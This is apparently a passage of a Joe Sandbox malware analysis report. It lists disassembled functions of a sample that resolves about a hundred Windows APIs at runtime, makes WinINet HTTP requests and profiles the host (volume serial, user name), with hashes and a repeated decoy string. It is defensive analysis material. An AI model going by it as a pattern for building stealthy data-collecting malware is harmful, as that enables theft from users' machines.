                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeapProtectVirtual
                                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                      • API String ID: 1542196881-2218711628
                                      • Opcode ID: d5b2e99fd46db3773760923cfd6d3937d0d23b7a6b0c69e8adfb6cd7234d23f7
                                      • Instruction ID: 307cac1193e5f3ea411efd0d988fdb1eee19b69b60cb1bc9ca0a04b3a3605426
                                      • Opcode Fuzzy Hash: d5b2e99fd46db3773760923cfd6d3937d0d23b7a6b0c69e8adfb6cd7234d23f7
                                      • Instruction Fuzzy Hash: B94112607C26057EEFB8FBA68C42E9F76775F43F08F415040FA0652682CBF87509656A

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1244 1162d0-11635b call 12aab0 call 114800 call 12aa50 InternetOpenA StrCmpCA 1251 116364-116368 1244->1251 1252 11635d 1244->1252 1253 116559-116575 call 12aab0 call 12ab10 * 2 1251->1253 1254 11636e-116392 InternetConnectA 1251->1254 1252->1251 1273 116578-11657d 1253->1273 1256 116398-11639c 1254->1256 1257 11654f-116553 InternetCloseHandle 1254->1257 1259 1163aa 1256->1259 1260 11639e-1163a8 1256->1260 1257->1253 1261 1163b4-1163e2 HttpOpenRequestA 1259->1261 1260->1261 1263 116545-116549 InternetCloseHandle 1261->1263 1264 1163e8-1163ec 1261->1264 1263->1257 1266 116415-116455 HttpSendRequestA HttpQueryInfoA 1264->1266 1267 1163ee-11640f InternetSetOptionA 1264->1267 1269 116457-116477 call 12aa50 call 12ab10 * 2 1266->1269 1270 11647c-11649b call 128ad0 1266->1270 1267->1266 1269->1273 1278 116519-116539 call 12aa50 call 12ab10 * 2 1270->1278 1279 11649d-1164a4 1270->1279 1278->1273 1282 116517-11653f InternetCloseHandle 1279->1282 1283 1164a6-1164d0 InternetReadFile 1279->1283 1282->1263 1284 1164d2-1164d9 1283->1284 1285 1164db 1283->1285 1284->1285 1289 1164dd-116515 call 12acc0 call 12abb0 call 12ab10 1284->1289 1285->1282 1289->1283
                                      APIs
                                        • Part of subcall function 0012AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0012AAF6
                                        • Part of subcall function 00114800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00114889
                                        • Part of subcall function 00114800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00114899
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                      • InternetOpenA.WININET(00130DFF,00000001,00000000,00000000,00000000), ref: 00116331
                                      • StrCmpCA.SHLWAPI(?,00E3F970), ref: 00116353
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00116385
                                      • HttpOpenRequestA.WININET(00000000,GET,?,00E3F0E0,00000000,00000000,00400100,00000000), ref: 001163D5
                                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0011640F
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00116421
                                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0011644D
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 001164BD
                                      • InternetCloseHandle.WININET(00000000), ref: 0011653F
                                      • InternetCloseHandle.WININET(00000000), ref: 00116549
                                      • InternetCloseHandle.WININET(00000000), ref: 00116553
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                      • String ID: ERROR$ERROR$GET
                                      • API String ID: 3749127164-2509457195
                                      • Opcode ID: 374f1beed2193f43b7e6d0f6a1cd21100047ab231b4f14c9e5a64432e9a608d3
                                      • Instruction ID: 80d1bf1c5675104b4f8f1439264f04133077deb46b50a173c2b0a7eb18e5bbf5
                                      • Opcode Fuzzy Hash: 374f1beed2193f43b7e6d0f6a1cd21100047ab231b4f14c9e5a64432e9a608d3
                                      • Instruction Fuzzy Hash: 48717F71A00218EBDB28DF90DC95BEE7779BF54700F1085A8F10A6B1D0DBB56A84CF51

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1356 127690-1276da GetWindowsDirectoryA 1357 1276e3-127757 GetVolumeInformationA call 128e90 * 3 1356->1357 1358 1276dc 1356->1358 1365 127768-12776f 1357->1365 1358->1357 1366 127771-12778a call 128e90 1365->1366 1367 12778c-1277a7 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 1277b8-1277e8 wsprintfA call 12aa50 1367->1369 1370 1277a9-1277b6 call 12aa50 1367->1370 1377 12780e-12781e 1369->1377 1370->1377
                                      APIs
                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 001276D2
                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0012770F
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00127793
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0012779A
                                      • wsprintfA.USER32 ref: 001277D0
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                      • String ID: :$C$\
                                      • API String ID: 1544550907-3809124531
                                      • Opcode ID: fe573b2c7ed48ead4579e023e3b1a576af8e043b86adf5987625c977457bcb3d
                                      • Instruction ID: b4e4de3be4c8caa854d472460f4e7577c4bc5fdec73ca028453ad814c7aa4575
                                      • Opcode Fuzzy Hash: fe573b2c7ed48ead4579e023e3b1a576af8e043b86adf5987625c977457bcb3d
                                      • Instruction Fuzzy Hash: 1141B3B1D04358EBDB11DF94EC85BDEBBB8AF18700F100199F609AB2C0D774AA54CBA5
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001111B7), ref: 00127A10
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00127A17
                                      • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00127A2F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateNameProcessUser
                                      • String ID:
                                      • API String ID: 1296208442-0
                                      • Opcode ID: 1b602368f0943b89a0bd8794e31c07873d755e13ffdef095292d5cc225d0f417
                                      • Instruction ID: bbcf97a8af6c3191dbf4dfe45d3631a26bfa1df6274dfd68a95416f6b77c6482
                                      • Opcode Fuzzy Hash: 1b602368f0943b89a0bd8794e31c07873d755e13ffdef095292d5cc225d0f417
                                      • Instruction Fuzzy Hash: 1CF04FB1D48249EBC714DF98ED85BAEBBBCEB05721F10061AFA15A7680C77515008BA1
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitInfoProcessSystem
                                      • String ID:
                                      • API String ID: 752954902-0
                                      • Opcode ID: a7938f5c6a29cd753cb82ba54cbbdbd2fc583ba43168fa414913d3d086bdec1c
                                      • Instruction ID: 0c41219702d2126b9d9d6e96b51e96f6c523064e74f5ae55bc83ee1f1fec6401
                                      • Opcode Fuzzy Hash: a7938f5c6a29cd753cb82ba54cbbdbd2fc583ba43168fa414913d3d086bdec1c
                                      • Instruction Fuzzy Hash: 94D09E7594430CABCB14DFE099896EDBB7CBB08715F100659DD0576280EB315495CA65

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 633 129f20-129f2a 634 129f30-12a341 GetProcAddress * 43 633->634 635 12a346-12a3da LoadLibraryA * 8 633->635 634->635 636 12a456-12a45d 635->636 637 12a3dc-12a451 GetProcAddress * 5 635->637 638 12a463-12a521 GetProcAddress * 8 636->638 639 12a526-12a52d 636->639 637->636 638->639 640 12a5a8-12a5af 639->640 641 12a52f-12a5a3 GetProcAddress * 5 639->641 642 12a647-12a64e 640->642 643 12a5b5-12a642 GetProcAddress * 6 640->643 641->640 644 12a654-12a72a GetProcAddress * 9 642->644 645 12a72f-12a736 642->645 643->642 644->645 646 12a7b2-12a7b9 645->646 647 12a738-12a7ad GetProcAddress * 5 645->647 648 12a7bb-12a7e7 GetProcAddress * 2 646->648 649 12a7ec-12a7f3 646->649 647->646 648->649 650 12a825-12a82c 649->650 651 12a7f5-12a820 GetProcAddress * 2 649->651 652 12a922-12a929 650->652 653 12a832-12a91d GetProcAddress * 10 650->653 651->650 654 12a92b-12a988 GetProcAddress * 4 652->654 655 12a98d-12a994 652->655 653->652 654->655 656 12a996-12a9a9 GetProcAddress 655->656 657 12a9ae-12a9b5 655->657 656->657 658 12a9b7-12aa13 GetProcAddress * 4 657->658 659 12aa18-12aa19 657->659 658->659
                                      APIs
                                      • GetProcAddress.KERNEL32(76210000,00E265D8), ref: 00129F3D
                                      • GetProcAddress.KERNEL32(76210000,00E26778), ref: 00129F55
                                      • GetProcAddress.KERNEL32(76210000,00E39888), ref: 00129F6E
                                      • GetProcAddress.KERNEL32(76210000,00E39810), ref: 00129F86
                                      • GetProcAddress.KERNEL32(76210000,00E39858), ref: 00129F9E
                                      • GetProcAddress.KERNEL32(76210000,00E3D910), ref: 00129FB7
                                      • GetProcAddress.KERNEL32(76210000,00E2A738), ref: 00129FCF
                                      • GetProcAddress.KERNEL32(76210000,00E3D880), ref: 00129FE7
                                      • GetProcAddress.KERNEL32(76210000,00E3D9A0), ref: 0012A000
                                      • GetProcAddress.KERNEL32(76210000,00E3D8E0), ref: 0012A018
                                      • GetProcAddress.KERNEL32(76210000,00E3D958), ref: 0012A030
                                      • GetProcAddress.KERNEL32(76210000,00E265F8), ref: 0012A049
                                      • GetProcAddress.KERNEL32(76210000,00E266B8), ref: 0012A061
                                      • GetProcAddress.KERNEL32(76210000,00E26798), ref: 0012A079
                                      • GetProcAddress.KERNEL32(76210000,00E26538), ref: 0012A092
                                      • GetProcAddress.KERNEL32(76210000,00E3D970), ref: 0012A0AA
                                      • GetProcAddress.KERNEL32(76210000,00E3D838), ref: 0012A0C2
                                      • GetProcAddress.KERNEL32(76210000,00E2A9E0), ref: 0012A0DB
                                      • GetProcAddress.KERNEL32(76210000,00E266D8), ref: 0012A0F3
                                      • GetProcAddress.KERNEL32(76210000,00E3D778), ref: 0012A10B
                                      • GetProcAddress.KERNEL32(76210000,00E3D988), ref: 0012A124
                                      • GetProcAddress.KERNEL32(76210000,00E3D7F0), ref: 0012A13C
                                      • GetProcAddress.KERNEL32(76210000,00E3D8F8), ref: 0012A154
                                      • GetProcAddress.KERNEL32(76210000,00E26858), ref: 0012A16D
                                      • GetProcAddress.KERNEL32(76210000,00E3DA48), ref: 0012A185
                                      • GetProcAddress.KERNEL32(76210000,00E3D928), ref: 0012A19D
                                      • GetProcAddress.KERNEL32(76210000,00E3D7D8), ref: 0012A1B6
                                      • GetProcAddress.KERNEL32(76210000,00E3D898), ref: 0012A1CE
                                      • GetProcAddress.KERNEL32(76210000,00E3D850), ref: 0012A1E6
                                      • GetProcAddress.KERNEL32(76210000,00E3D940), ref: 0012A1FF
                                      • GetProcAddress.KERNEL32(76210000,00E3D808), ref: 0012A217
                                      • GetProcAddress.KERNEL32(76210000,00E3D8B0), ref: 0012A22F
                                      • GetProcAddress.KERNEL32(76210000,00E3DA60), ref: 0012A248
                                      • GetProcAddress.KERNEL32(76210000,00E2FD28), ref: 0012A260
                                      • GetProcAddress.KERNEL32(76210000,00E3D820), ref: 0012A278
                                      • GetProcAddress.KERNEL32(76210000,00E3D9B8), ref: 0012A291
                                      • GetProcAddress.KERNEL32(76210000,00E26618), ref: 0012A2A9
                                      • GetProcAddress.KERNEL32(76210000,00E3D9D0), ref: 0012A2C1
                                      • GetProcAddress.KERNEL32(76210000,00E26738), ref: 0012A2DA
                                      • GetProcAddress.KERNEL32(76210000,00E3DA00), ref: 0012A2F2
                                      • GetProcAddress.KERNEL32(76210000,00E3D868), ref: 0012A30A
                                      • GetProcAddress.KERNEL32(76210000,00E267B8), ref: 0012A323
                                      • GetProcAddress.KERNEL32(76210000,00E267D8), ref: 0012A33B
                                      • LoadLibraryA.KERNEL32(00E3D8C8,?,00125EF3,00130AEB,?,?,?,?,?,?,?,?,?,?,00130AEA,00130AE7), ref: 0012A34D
                                      • LoadLibraryA.KERNEL32(00E3D7A8,?,00125EF3,00130AEB,?,?,?,?,?,?,?,?,?,?,00130AEA,00130AE7), ref: 0012A35E
                                      • LoadLibraryA.KERNEL32(00E3D9E8,?,00125EF3,00130AEB,?,?,?,?,?,?,?,?,?,?,00130AEA,00130AE7), ref: 0012A370
                                      • LoadLibraryA.KERNEL32(00E3DA18,?,00125EF3,00130AEB,?,?,?,?,?,?,?,?,?,?,00130AEA,00130AE7), ref: 0012A382
                                      • LoadLibraryA.KERNEL32(00E3DA30,?,00125EF3,00130AEB,?,?,?,?,?,?,?,?,?,?,00130AEA,00130AE7), ref: 0012A393
                                      • LoadLibraryA.KERNEL32(00E3D790,?,00125EF3,00130AEB,?,?,?,?,?,?,?,?,?,?,00130AEA,00130AE7), ref: 0012A3A5
                                      • LoadLibraryA.KERNEL32(00E3D7C0,?,00125EF3,00130AEB,?,?,?,?,?,?,?,?,?,?,00130AEA,00130AE7), ref: 0012A3B7
                                      • LoadLibraryA.KERNEL32(00E3DA78,?,00125EF3,00130AEB,?,?,?,?,?,?,?,?,?,?,00130AEA,00130AE7), ref: 0012A3C8
                                      • GetProcAddress.KERNEL32(751E0000,00E261B8), ref: 0012A3EA
                                      • GetProcAddress.KERNEL32(751E0000,00E3DC10), ref: 0012A402
                                      • GetProcAddress.KERNEL32(751E0000,00E391B0), ref: 0012A41A
                                      • GetProcAddress.KERNEL32(751E0000,00E3DBE0), ref: 0012A433
                                      • GetProcAddress.KERNEL32(751E0000,00E262B8), ref: 0012A44B
                                      • GetProcAddress.KERNEL32(700F0000,00E2A760), ref: 0012A470
                                      • GetProcAddress.KERNEL32(700F0000,00E262D8), ref: 0012A489
                                      • GetProcAddress.KERNEL32(700F0000,00E2A8A0), ref: 0012A4A1
                                      • GetProcAddress.KERNEL32(700F0000,00E3DCD0), ref: 0012A4B9
                                      • GetProcAddress.KERNEL32(700F0000,00E3DB68), ref: 0012A4D2
                                      • GetProcAddress.KERNEL32(700F0000,00E263F8), ref: 0012A4EA
                                      • GetProcAddress.KERNEL32(700F0000,00E261D8), ref: 0012A502
                                      • GetProcAddress.KERNEL32(700F0000,00E3DB80), ref: 0012A51B
                                      • GetProcAddress.KERNEL32(753A0000,00E26478), ref: 0012A53C
                                      • GetProcAddress.KERNEL32(753A0000,00E26438), ref: 0012A554
                                      • GetProcAddress.KERNEL32(753A0000,00E3DCA0), ref: 0012A56D
                                      • GetProcAddress.KERNEL32(753A0000,00E3DB98), ref: 0012A585
                                      • GetProcAddress.KERNEL32(753A0000,00E260F8), ref: 0012A59D
                                      • GetProcAddress.KERNEL32(76310000,00E2AA08), ref: 0012A5C3
                                      • GetProcAddress.KERNEL32(76310000,00E2AA30), ref: 0012A5DB
                                      • GetProcAddress.KERNEL32(76310000,00E3DAA8), ref: 0012A5F3
                                      • GetProcAddress.KERNEL32(76310000,00E262F8), ref: 0012A60C
                                      • GetProcAddress.KERNEL32(76310000,00E26318), ref: 0012A624
                                      • GetProcAddress.KERNEL32(76310000,00E2AA80), ref: 0012A63C
                                      • GetProcAddress.KERNEL32(76910000,00E3DC70), ref: 0012A662
                                      • GetProcAddress.KERNEL32(76910000,00E26358), ref: 0012A67A
                                      • GetProcAddress.KERNEL32(76910000,00E391D0), ref: 0012A692
                                      • GetProcAddress.KERNEL32(76910000,00E3DCB8), ref: 0012A6AB
                                      • GetProcAddress.KERNEL32(76910000,00E3DD48), ref: 0012A6C3
                                      • GetProcAddress.KERNEL32(76910000,00E26378), ref: 0012A6DB
                                      • GetProcAddress.KERNEL32(76910000,00E26458), ref: 0012A6F4
                                      • GetProcAddress.KERNEL32(76910000,00E3DD00), ref: 0012A70C
                                      • GetProcAddress.KERNEL32(76910000,00E3DC40), ref: 0012A724
                                      • GetProcAddress.KERNEL32(75B30000,00E26158), ref: 0012A746
                                      • GetProcAddress.KERNEL32(75B30000,00E3DC28), ref: 0012A75E
                                      • GetProcAddress.KERNEL32(75B30000,00E3DB20), ref: 0012A776
                                      • GetProcAddress.KERNEL32(75B30000,00E3DB50), ref: 0012A78F
                                      • GetProcAddress.KERNEL32(75B30000,00E3DC88), ref: 0012A7A7
                                      • GetProcAddress.KERNEL32(75670000,00E26498), ref: 0012A7C8
                                      • GetProcAddress.KERNEL32(75670000,00E261F8), ref: 0012A7E1
                                      • GetProcAddress.KERNEL32(76AC0000,00E26338), ref: 0012A802
                                      • GetProcAddress.KERNEL32(76AC0000,00E3DD60), ref: 0012A81A
                                      • GetProcAddress.KERNEL32(6F4E0000,00E264B8), ref: 0012A840
                                      • GetProcAddress.KERNEL32(6F4E0000,00E263D8), ref: 0012A858
                                      • GetProcAddress.KERNEL32(6F4E0000,00E26418), ref: 0012A870
                                      • GetProcAddress.KERNEL32(6F4E0000,00E3DD18), ref: 0012A889
                                      • GetProcAddress.KERNEL32(6F4E0000,00E260D8), ref: 0012A8A1
                                      • GetProcAddress.KERNEL32(6F4E0000,00E26118), ref: 0012A8B9
                                      • GetProcAddress.KERNEL32(6F4E0000,00E26138), ref: 0012A8D2
                                      • GetProcAddress.KERNEL32(6F4E0000,00E26178), ref: 0012A8EA
                                      • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 0012A901
                                      • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 0012A917
                                      • GetProcAddress.KERNEL32(75AE0000,00E3DB08), ref: 0012A939
                                      • GetProcAddress.KERNEL32(75AE0000,00E39220), ref: 0012A951
                                      • GetProcAddress.KERNEL32(75AE0000,00E3DB38), ref: 0012A969
                                      • GetProcAddress.KERNEL32(75AE0000,00E3DBC8), ref: 0012A982
                                      • GetProcAddress.KERNEL32(76300000,00E26198), ref: 0012A9A3
                                      • GetProcAddress.KERNEL32(6E9A0000,00E3DCE8), ref: 0012A9C4
                                      • GetProcAddress.KERNEL32(6E9A0000,00E26398), ref: 0012A9DD
                                      • GetProcAddress.KERNEL32(6E9A0000,00E3DA90), ref: 0012A9F5
